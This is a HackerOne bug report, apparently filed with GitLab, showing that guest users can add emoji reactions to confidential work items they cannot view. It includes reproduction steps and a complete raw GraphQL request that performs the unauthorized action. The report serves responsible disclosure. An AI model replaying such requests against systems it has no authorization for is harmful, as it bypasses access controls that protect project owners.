Guest users can react (emojis) on confidential work items which they cant see in a project
HackerOne report #2036500 by ashish_r_padelkar
on 2023-06-23, assigned to @ottilia_westerlund:
Report | Attachments | How To Reproduce
Report
Hello,
Confidential tasks can be created for a issue within a project. These confidential tasks (work items) are created as issues and are visible only to Reporters or Higher
user roles.
There is a bug where guest users within a project can react with emojis to such private tasks/work item even when they are confidential and cant be seen.
Steps to reproduce
1.Go to https://gitlab.com/<groupNamespace>/<projectNamespace>/-/issues
and create an issue.
2.Now add confidential task to it using below option.
3.Add a guest user to your project or group at https://gitlab.com/groups/<groupNamespace>/-/group_members
.
4.Login as guest user.
5.Go to the issue created in step1.
6.You see the issue but not the task as its private.
7.Guess the private task item ID and replace it in below graphql request.
POST /api/graphql HTTP/2
Host: gitlab.com
Cookie: 1
Content-Length: 316
X-Gitlab-Feature-Category: team_planning
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
X-Csrf-Token: 1
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Sec-Ch-Ua-Platform: "macOS"
Origin: https://gitlab.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://gitlab.com/groupjune23/latest_project/-/work_items/25
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
[{"operationName":"updateWorkItemAwardEmojiWidget","variables":{"input":{"awardableId":"gid://gitlab/WorkItem/128497667","name":"thumbsup"}},"query":"mutation updateWorkItemAwardEmojiWidget($input: AwardEmojiToggleInput!) {\n awardEmojiToggle(input: $input) {\n errors\n toggledOn\n __typename\n }\n}\n"}]
Where 128497667
is the private task ID.
8.Also replace your Cookie
and X-Csrf-Token
.
9.Send the request and it will be successful.
Now as an admin, check the private work item/task item . You should see thumbsup
reaction appeared on it.This happens despite guest user cant see that task.
What is the current bug behavior?
Guest users can react emojis on private work items which they cant see within a project.
What is the expected correct behavior?
Only users who has access to private work items should be able to react on it.
Output of checks
This bug happens on GitLab.com. GitLab Enterprise Edition 16.2.0-pre 2a4d9de2b78
Regards,
Ashish
Impact
Guest users can react on confidential work items which they cant see in a project
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: